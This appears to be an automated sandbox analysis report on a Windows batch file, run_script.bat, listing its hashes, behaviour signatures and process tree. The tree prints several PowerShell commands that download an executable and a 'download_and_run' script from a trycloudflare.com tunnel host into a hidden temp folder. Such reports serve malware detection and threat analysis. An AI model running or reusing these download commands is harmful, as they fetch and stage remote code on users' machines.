Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 11:27
Static task
static1
Behavioral task
behavioral1
Sample
run_script.bat
Resource
win7-20240903-en
General
-
Target
run_script.bat
-
Size
8KB
-
MD5
2efffa15097ea8c880a10b0fea32054e
-
SHA1
f3e247d6aa4a2da2776a527e5ff7251576c1b260
-
SHA256
ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
-
SHA512
caa107de8dd85690f576f01b69095f659465d6f7de8d079b06bb23dbf01c95e7e10d857535af2a523e42c8b6e775a8e819bb0413aa6a6b3c38c19f7ffcf88e76
-
SSDEEP
192:CincTy8G+hpQyuPmhDGEhtKCDw16/zbq/Z/+Hz6XlNnGwzA84q7YmvqMA0b:gTYcpQyuPmhDGEhtKCVa/k+vnGUA84yR
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2952 powershell.exe 2804 powershell.exe 2676 powershell.exe 2468 powershell.exe 2804 powershell.exe 2676 powershell.exe 2468 powershell.exe 2952 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2468 powershell.exe 2952 powershell.exe 2804 powershell.exe 2676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2952 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 2480 wrote to memory of 2468 2480 cmd.exe 32 PID 2480 wrote to memory of 2468 2480 cmd.exe 32 PID 2480 wrote to memory of 2468 2480 cmd.exe 32 PID 2480 wrote to memory of 2952 2480 cmd.exe 33 PID 2480 wrote to memory of 2952 2480 cmd.exe 33 PID 2480 wrote to memory of 2952 2480 cmd.exe 33 PID 2480 wrote to memory of 2804 2480 cmd.exe 34 PID 2480 wrote to memory of 2804 2480 cmd.exe 34 PID 2480 wrote to memory of 2804 2480 cmd.exe 34 PID 2480 wrote to memory of 2676 2480 cmd.exe 35 PID 2480 wrote to memory of 2676 2480 cmd.exe 35 PID 2480 wrote to memory of 2676 2480 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54222af73b1775a156ec77fb80b99f0fb
SHA1fc823804ca071b6d011bf647064fa6e40ecfd4cd
SHA2565f19d3970796ae6453315c3dc837ea68f11e949c1017012ea695e1206ccaa3ae
SHA51226fabd321d73ec1a2e21ee4c869155f918c83a98869017f11d105ab6caedd42613742dc27cda8da9d604fb6206efeaa158526b376f629ed8fee59bea16e9ad22